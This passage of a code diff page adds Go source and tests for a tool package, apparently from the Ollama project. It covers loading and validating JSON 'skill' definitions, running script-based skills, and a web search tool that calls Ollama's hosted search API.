||||
|
||||
if sb.Len() == 0 {
|
||||
return "(no output)", nil
|
||||
}
|
||||
|
||||
return sb.String(), nil
|
||||
}
|
||||
|
||||
// executeHTTP runs an HTTP-based skill.
|
||||
func (s *SkillTool) executeHTTP(args map[string]any) (string, error) {
|
||||
// HTTP executor is a placeholder for future implementation
|
||||
return "", fmt.Errorf("http executor not yet implemented")
|
||||
}
|
||||
|
||||
// LoadSkillsFile loads skill definitions from a JSON file.
|
||||
func LoadSkillsFile(path string) (*SkillsFile, error) {
|
||||
data, err := os.ReadFile(path)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("reading skills file: %w", err)
|
||||
}
|
||||
|
||||
var file SkillsFile
|
||||
if err := json.Unmarshal(data, &file); err != nil {
|
||||
return nil, fmt.Errorf("parsing skills file: %w", err)
|
||||
}
|
||||
|
||||
if file.Version == "" {
|
||||
file.Version = "1"
|
||||
}
|
||||
|
||||
return &file, nil
|
||||
}
|
||||
|
||||
// RegisterSkillsFromFile loads skills from a file and registers them with the registry.
|
||||
func RegisterSkillsFromFile(registry *Registry, path string) error {
|
||||
file, err := LoadSkillsFile(path)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
for _, spec := range file.Skills {
|
||||
if err := validateSkillSpec(spec); err != nil {
|
||||
return fmt.Errorf("invalid skill %q: %w", spec.Name, err)
|
||||
}
|
||||
registry.Register(NewSkillTool(spec))
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// FindSkillsFiles searches for skill definition files in standard locations.
|
||||
// It looks for:
|
||||
// - ./ollama-skills.json (current directory)
|
||||
// - ~/.ollama/skills.json (user config)
|
||||
// - ~/.config/ollama/skills.json (XDG config)
|
||||
func FindSkillsFiles() []string {
|
||||
var files []string
|
||||
|
||||
// Current directory
|
||||
if _, err := os.Stat("ollama-skills.json"); err == nil {
|
||||
files = append(files, "ollama-skills.json")
|
||||
}
|
||||
|
||||
// Home directory
|
||||
home, err := os.UserHomeDir()
|
||||
if err == nil {
|
||||
paths := []string{
|
||||
filepath.Join(home, ".ollama", "skills.json"),
|
||||
filepath.Join(home, ".config", "ollama", "skills.json"),
|
||||
}
|
||||
for _, p := range paths {
|
||||
if _, err := os.Stat(p); err == nil {
|
||||
files = append(files, p)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return files
|
||||
}
|
||||
|
||||
// LoadAllSkills loads skills from all discovered skill files into the registry.
|
||||
func LoadAllSkills(registry *Registry) ([]string, error) {
|
||||
files := FindSkillsFiles()
|
||||
var loaded []string
|
||||
|
||||
for _, path := range files {
|
||||
if err := RegisterSkillsFromFile(registry, path); err != nil {
|
||||
return loaded, fmt.Errorf("loading %s: %w", path, err)
|
||||
}
|
||||
loaded = append(loaded, path)
|
||||
}
|
||||
|
||||
return loaded, nil
|
||||
}
|
||||
|
||||
// validateSkillSpec validates a skill specification.
|
||||
func validateSkillSpec(spec SkillSpec) error {
|
||||
if spec.Name == "" {
|
||||
return fmt.Errorf("name is required")
|
||||
}
|
||||
if spec.Description == "" {
|
||||
return fmt.Errorf("description is required")
|
||||
}
|
||||
if spec.Executor.Type == "" {
|
||||
return fmt.Errorf("executor.type is required")
|
||||
}
|
||||
|
||||
switch spec.Executor.Type {
|
||||
case "script":
|
||||
if spec.Executor.Command == "" {
|
||||
return fmt.Errorf("executor.command is required for script type")
|
||||
}
|
||||
case "http":
|
||||
if spec.Executor.URL == "" {
|
||||
return fmt.Errorf("executor.url is required for http type")
|
||||
}
|
||||
default:
|
||||
return fmt.Errorf("unknown executor type: %s", spec.Executor.Type)
|
||||
}
|
||||
|
||||
for _, param := range spec.Parameters {
|
||||
if param.Name == "" {
|
||||
return fmt.Errorf("parameter name is required")
|
||||
}
|
||||
if param.Type == "" {
|
||||
return fmt.Errorf("parameter type is required for %s", param.Name)
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
368
x/tools/skills_test.go
Normal file
368
x/tools/skills_test.go
Normal file
@@ -0,0 +1,368 @@
|
||||
package tools
|
||||
|
||||
import (
|
||||
"os"
|
||||
"path/filepath"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestValidateSkillSpec(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
spec SkillSpec
|
||||
wantErr bool
|
||||
errMsg string
|
||||
}{
|
||||
{
|
||||
name: "valid script skill",
|
||||
spec: SkillSpec{
|
||||
Name: "test_skill",
|
||||
Description: "A test skill",
|
||||
Parameters: []SkillParameter{
|
||||
{Name: "input", Type: "string", Description: "Input value", Required: true},
|
||||
},
|
||||
Executor: SkillExecutor{
|
||||
Type: "script",
|
||||
Command: "echo",
|
||||
},
|
||||
},
|
||||
wantErr: false,
|
||||
},
|
||||
{
|
||||
name: "valid http skill",
|
||||
spec: SkillSpec{
|
||||
Name: "http_skill",
|
||||
Description: "An HTTP skill",
|
||||
Executor: SkillExecutor{
|
||||
Type: "http",
|
||||
URL: "https://example.com/api",
|
||||
},
|
||||
},
|
||||
wantErr: false,
|
||||
},
|
||||
{
|
||||
name: "missing name",
|
||||
spec: SkillSpec{
|
||||
Description: "A skill without name",
|
||||
Executor: SkillExecutor{Type: "script", Command: "echo"},
|
||||
},
|
||||
wantErr: true,
|
||||
errMsg: "name is required",
|
||||
},
|
||||
{
|
||||
name: "missing description",
|
||||
spec: SkillSpec{
|
||||
Name: "no_desc",
|
||||
Executor: SkillExecutor{Type: "script", Command: "echo"},
|
||||
},
|
||||
wantErr: true,
|
||||
errMsg: "description is required",
|
||||
},
|
||||
{
|
||||
name: "missing executor type",
|
||||
spec: SkillSpec{
|
||||
Name: "no_exec_type",
|
||||
Description: "Missing executor type",
|
||||
Executor: SkillExecutor{Command: "echo"},
|
||||
},
|
||||
wantErr: true,
|
||||
errMsg: "executor.type is required",
|
||||
},
|
||||
{
|
||||
name: "script missing command",
|
||||
spec: SkillSpec{
|
||||
Name: "script_no_cmd",
|
||||
Description: "Script without command",
|
||||
Executor: SkillExecutor{Type: "script"},
|
||||
},
|
||||
wantErr: true,
|
||||
errMsg: "executor.command is required",
|
||||
},
|
||||
{
|
||||
name: "http missing url",
|
||||
spec: SkillSpec{
|
||||
Name: "http_no_url",
|
||||
Description: "HTTP without URL",
|
||||
Executor: SkillExecutor{Type: "http"},
|
||||
},
|
||||
wantErr: true,
|
||||
errMsg: "executor.url is required",
|
||||
},
|
||||
{
|
||||
name: "unknown executor type",
|
||||
spec: SkillSpec{
|
||||
Name: "unknown_type",
|
||||
Description: "Unknown executor",
|
||||
Executor: SkillExecutor{Type: "invalid"},
|
||||
},
|
||||
wantErr: true,
|
||||
errMsg: "unknown executor type",
|
||||
},
|
||||
{
|
||||
name: "parameter missing name",
|
||||
spec: SkillSpec{
|
||||
Name: "param_no_name",
|
||||
Description: "Parameter without name",
|
||||
Parameters: []SkillParameter{{Type: "string", Description: "desc"}},
|
||||
Executor: SkillExecutor{Type: "script", Command: "echo"},
|
||||
},
|
||||
wantErr: true,
|
||||
errMsg: "parameter name is required",
|
||||
},
|
||||
{
|
||||
name: "parameter missing type",
|
||||
spec: SkillSpec{
|
||||
Name: "param_no_type",
|
||||
Description: "Parameter without type",
|
||||
Parameters: []SkillParameter{{Name: "foo", Description: "desc"}},
|
||||
Executor: SkillExecutor{Type: "script", Command: "echo"},
|
||||
},
|
||||
wantErr: true,
|
||||
errMsg: "parameter type is required",
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
err := validateSkillSpec(tt.spec)
|
||||
if tt.wantErr {
|
||||
if err == nil {
|
||||
t.Errorf("expected error containing %q, got nil", tt.errMsg)
|
||||
} else if tt.errMsg != "" && !contains(err.Error(), tt.errMsg) {
|
||||
t.Errorf("expected error containing %q, got %q", tt.errMsg, err.Error())
|
||||
}
|
||||
} else if err != nil {
|
||||
t.Errorf("unexpected error: %v", err)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestLoadSkillsFile(t *testing.T) {
|
||||
// Create a temporary skills file
|
||||
tmpDir := t.TempDir()
|
||||
skillsPath := filepath.Join(tmpDir, "skills.json")
|
||||
|
||||
content := `{
|
||||
"version": "1",
|
||||
"skills": [
|
||||
{
|
||||
"name": "echo_skill",
|
||||
"description": "Echoes the input",
|
||||
"parameters": [
|
||||
{"name": "message", "type": "string", "description": "Message to echo", "required": true}
|
||||
],
|
||||
"executor": {
|
||||
"type": "script",
|
||||
"command": "echo",
|
||||
"timeout": 30
|
||||
}
|
||||
}
|
||||
]
|
||||
}`
|
||||
|
||||
if err := os.WriteFile(skillsPath, []byte(content), 0644); err != nil {
|
||||
t.Fatalf("failed to write test file: %v", err)
|
||||
}
|
||||
|
||||
file, err := LoadSkillsFile(skillsPath)
|
||||
if err != nil {
|
||||
t.Fatalf("LoadSkillsFile failed: %v", err)
|
||||
}
|
||||
|
||||
if file.Version != "1" {
|
||||
t.Errorf("expected version 1, got %s", file.Version)
|
||||
}
|
||||
|
||||
if len(file.Skills) != 1 {
|
||||
t.Fatalf("expected 1 skill, got %d", len(file.Skills))
|
||||
}
|
||||
|
||||
skill := file.Skills[0]
|
||||
if skill.Name != "echo_skill" {
|
||||
t.Errorf("expected name 'echo_skill', got %s", skill.Name)
|
||||
}
|
||||
if skill.Executor.Timeout != 30 {
|
||||
t.Errorf("expected timeout 30, got %d", skill.Executor.Timeout)
|
||||
}
|
||||
if len(skill.Parameters) != 1 {
|
||||
t.Errorf("expected 1 parameter, got %d", len(skill.Parameters))
|
||||
}
|
||||
}
|
||||
|
||||
func TestRegisterSkillsFromFile(t *testing.T) {
|
||||
tmpDir := t.TempDir()
|
||||
skillsPath := filepath.Join(tmpDir, "skills.json")
|
||||
|
||||
content := `{
|
||||
"version": "1",
|
||||
"skills": [
|
||||
{
|
||||
"name": "skill_a",
|
||||
"description": "Skill A",
|
||||
"executor": {"type": "script", "command": "echo"}
|
||||
},
|
||||
{
|
||||
"name": "skill_b",
|
||||
"description": "Skill B",
|
||||
"executor": {"type": "script", "command": "cat"}
|
||||
}
|
||||
]
|
||||
}`
|
||||
|
||||
if err := os.WriteFile(skillsPath, []byte(content), 0644); err != nil {
|
||||
t.Fatalf("failed to write test file: %v", err)
|
||||
}
|
||||
|
||||
registry := NewRegistry()
|
||||
if err := RegisterSkillsFromFile(registry, skillsPath); err != nil {
|
||||
t.Fatalf("RegisterSkillsFromFile failed: %v", err)
|
||||
}
|
||||
|
||||
if registry.Count() != 2 {
|
||||
t.Errorf("expected 2 tools, got %d", registry.Count())
|
||||
}
|
||||
|
||||
names := registry.Names()
|
||||
if names[0] != "skill_a" || names[1] != "skill_b" {
|
||||
t.Errorf("unexpected tool names: %v", names)
|
||||
}
|
||||
}
|
||||
|
||||
func TestSkillToolSchema(t *testing.T) {
|
||||
spec := SkillSpec{
|
||||
Name: "test_tool",
|
||||
Description: "A test tool",
|
||||
Parameters: []SkillParameter{
|
||||
{Name: "required_param", Type: "string", Description: "Required", Required: true},
|
||||
{Name: "optional_param", Type: "number", Description: "Optional", Required: false},
|
||||
},
|
||||
Executor: SkillExecutor{Type: "script", Command: "echo"},
|
||||
}
|
||||
|
||||
tool := NewSkillTool(spec)
|
||||
|
||||
if tool.Name() != "test_tool" {
|
||||
t.Errorf("expected name 'test_tool', got %s", tool.Name())
|
||||
}
|
||||
|
||||
if tool.Description() != "A test tool" {
|
||||
t.Errorf("expected description 'A test tool', got %s", tool.Description())
|
||||
}
|
||||
|
||||
schema := tool.Schema()
|
||||
if schema.Name != "test_tool" {
|
||||
t.Errorf("schema name mismatch")
|
||||
}
|
||||
|
||||
if len(schema.Parameters.Required) != 1 {
|
||||
t.Errorf("expected 1 required param, got %d", len(schema.Parameters.Required))
|
||||
}
|
||||
if schema.Parameters.Required[0] != "required_param" {
|
||||
t.Errorf("wrong required param: %v", schema.Parameters.Required)
|
||||
}
|
||||
}
|
||||
|
||||
func TestSkillToolExecuteScript(t *testing.T) {
|
||||
spec := SkillSpec{
|
||||
Name: "echo_test",
|
||||
Description: "Echo test",
|
||||
Executor: SkillExecutor{
|
||||
Type: "script",
|
||||
Command: "cat",
|
||||
Timeout: 5,
|
||||
},
|
||||
}
|
||||
|
||||
tool := NewSkillTool(spec)
|
||||
|
||||
// cat will read JSON from stdin and output it
|
||||
result, err := tool.Execute(map[string]any{"message": "hello"})
|
||||
if err != nil {
|
||||
t.Fatalf("Execute failed: %v", err)
|
||||
}
|
||||
|
||||
if !contains(result, "message") || !contains(result, "hello") {
|
||||
t.Errorf("expected JSON output with 'message' and 'hello', got: %s", result)
|
||||
}
|
||||
}
|
||||
|
||||
func TestSkillToolExecuteHTTPNotImplemented(t *testing.T) {
|
||||
spec := SkillSpec{
|
||||
Name: "http_test",
|
||||
Description: "HTTP test",
|
||||
Executor: SkillExecutor{
|
||||
Type: "http",
|
||||
URL: "https://example.com",
|
||||
},
|
||||
}
|
||||
|
||||
tool := NewSkillTool(spec)
|
||||
_, err := tool.Execute(map[string]any{})
|
||||
if err == nil {
|
||||
t.Error("expected error for http executor")
|
||||
}
|
||||
if !contains(err.Error(), "not yet implemented") {
|
||||
t.Errorf("unexpected error: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestLoadSkillsFileNotFound(t *testing.T) {
|
||||
_, err := LoadSkillsFile("/nonexistent/path/skills.json")
|
||||
if err == nil {
|
||||
t.Error("expected error for nonexistent file")
|
||||
}
|
||||
}
|
||||
|
||||
func TestLoadSkillsFileInvalidJSON(t *testing.T) {
|
||||
tmpDir := t.TempDir()
|
||||
skillsPath := filepath.Join(tmpDir, "invalid.json")
|
||||
|
||||
if err := os.WriteFile(skillsPath, []byte("not valid json"), 0644); err != nil {
|
||||
t.Fatalf("failed to write test file: %v", err)
|
||||
}
|
||||
|
||||
_, err := LoadSkillsFile(skillsPath)
|
||||
if err == nil {
|
||||
t.Error("expected error for invalid JSON")
|
||||
}
|
||||
}
|
||||
|
||||
func TestRegisterSkillsFromFileInvalidSkill(t *testing.T) {
|
||||
tmpDir := t.TempDir()
|
||||
skillsPath := filepath.Join(tmpDir, "invalid_skill.json")
|
||||
|
||||
content := `{
|
||||
"version": "1",
|
||||
"skills": [
|
||||
{
|
||||
"name": "",
|
||||
"description": "Missing name",
|
||||
"executor": {"type": "script", "command": "echo"}
|
||||
}
|
||||
]
|
||||
}`
|
||||
|
||||
if err := os.WriteFile(skillsPath, []byte(content), 0644); err != nil {
|
||||
t.Fatalf("failed to write test file: %v", err)
|
||||
}
|
||||
|
||||
registry := NewRegistry()
|
||||
err := RegisterSkillsFromFile(registry, skillsPath)
|
||||
if err == nil {
|
||||
t.Error("expected error for invalid skill")
|
||||
}
|
||||
}
|
||||
|
||||
func contains(s, substr string) bool {
|
||||
return len(s) >= len(substr) && (s == substr || len(s) > 0 && containsHelper(s, substr))
|
||||
}
|
||||
|
||||
func containsHelper(s, substr string) bool {
|
||||
for i := 0; i <= len(s)-len(substr); i++ {
|
||||
if s[i:i+len(substr)] == substr {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
148
x/tools/websearch.go
Normal file
148
x/tools/websearch.go
Normal file
@@ -0,0 +1,148 @@
|
||||
package tools
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io"
|
||||
"net/http"
|
||||
"os"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/ollama/ollama/api"
|
||||
)
|
||||
|
||||
const (
|
||||
webSearchAPI = "https://ollama.com/api/web_search"
|
||||
webSearchTimeout = 15 * time.Second
|
||||
)
|
||||
|
||||
// WebSearchTool implements web search using Ollama's hosted API.
|
||||
type WebSearchTool struct{}
|
||||
|
||||
// Name returns the tool name.
|
||||
func (w *WebSearchTool) Name() string {
|
||||
return "web_search"
|
||||
}
|
||||
|
||||
// Description returns a description of the tool.
|
||||
func (w *WebSearchTool) Description() string {
|
||||
return "Search the web for current information. Use this when you need up-to-date information that may not be in your training data."
|
||||
}
|
||||
|
||||
// Schema returns the tool's parameter schema.
|
||||
func (w *WebSearchTool) Schema() api.ToolFunction {
|
||||
props := api.NewToolPropertiesMap()
|
||||
props.Set("query", api.ToolProperty{
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "The search query to look up on the web",
|
||||
})
|
||||
return api.ToolFunction{
|
||||
Name: w.Name(),
|
||||
Description: w.Description(),
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: props,
|
||||
Required: []string{"query"},
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
// webSearchRequest is the request body for the web search API.
|
||||
type webSearchRequest struct {
|
||||
Query string `json:"query"`
|
||||
MaxResults int `json:"max_results,omitempty"`
|
||||
}
|
||||
|
||||
// webSearchResponse is the response from the web search API.
|
||||
type webSearchResponse struct {
|
||||
Results []webSearchResult `json:"results"`
|
||||
}
|
||||
|
||||
// webSearchResult is a single search result.
|
||||
type webSearchResult struct {
|
||||
Title string `json:"title"`
|
||||
URL string `json:"url"`
|
||||
Content string `json:"content"`
|
||||
}
|
||||
|
||||
// Execute performs the web search.
|
||||
func (w *WebSearchTool) Execute(args map[string]any) (string, error) {
|
||||
query, ok := args["query"].(string)
|
||||
if !ok || query == "" {
|
||||
return "", fmt.Errorf("query parameter is required")
|
||||
}
|
||||
|
||||
apiKey := os.Getenv("OLLAMA_API_KEY")
|
||||
if apiKey == "" {
|
||||
return "", fmt.Errorf("OLLAMA_API_KEY environment variable is required for web search")
|
||||
}
|
||||
|
||||
// Prepare request
|
||||
reqBody := webSearchRequest{
|
||||
Query: query,
|
||||
MaxResults: 5,
|
||||
}
|
||||
|
||||
jsonBody, err := json.Marshal(reqBody)
|
||||
if err != nil {
|
||||
return "", fmt.Errorf("marshaling request: %w", err)
|
||||
}
|
||||
|
||||
req, err := http.NewRequest("POST", webSearchAPI, bytes.NewBuffer(jsonBody))
|
||||
if err != nil {
|
||||
return "", fmt.Errorf("creating request: %w", err)
|
||||
}
|
||||
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
req.Header.Set("Authorization", "Bearer "+apiKey)
|
||||
|
||||
// Send request
|
||||
client := &http.Client{Timeout: webSearchTimeout}
|
||||
resp, err := client.Do(req)
|
||||
if err != nil {
|
||||
return "", fmt.Errorf("sending request: %w", err)
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
|
||||
body, err := io.ReadAll(resp.Body)
|
||||
if err != nil {
|
||||
return "", fmt.Errorf("reading response: %w", err)
|
||||
}
|
||||
|
||||
if resp.StatusCode != http.StatusOK {
|
||||
return "", fmt.Errorf("web search API returned status %d: %s", resp.StatusCode, string(body))
|
||||
}
|
||||
|
||||
// Parse response
|
||||
var searchResp webSearchResponse
|
||||
if err := json.Unmarshal(body, &searchResp); err != nil {
|
||||
return "", fmt.Errorf("parsing response: %w", err)
|
||||
}
|
||||
|
||||
// Format results
|
||||
if len(searchResp.Results) == 0 {
|
||||
return "No results found for query: " + query, nil
|
||||
}
|
||||
|
||||
var sb strings.Builder
|
||||
sb.WriteString(fmt.Sprintf("Search results for: %s\n\n", query))
|
||||
|
||||
for i, result := range searchResp.Results {
|
||||
sb.WriteString(fmt.Sprintf("%d. %s\n", i+1, result.Title))
|
||||
sb.WriteString(fmt.Sprintf(" URL: %s\n", result.URL))
|
||||
if result.Content != "" {
|
||||
// Truncate long content (UTF-8 safe)
|
||||
content := result.Content
|
||||
runes := []rune(content)
|
||||
if len(runes) > 300 {
|
||||
content = string(runes[:300]) + "..."
|
||||
}
|
||||
sb.WriteString(fmt.Sprintf(" %s\n", content))
|
||||
}
|
||||
sb.WriteString("\n")
|
||||
}
|
||||
|
||||
return sb.String(), nil
|
||||
}
|
||||
Reference in New Issue
Block a user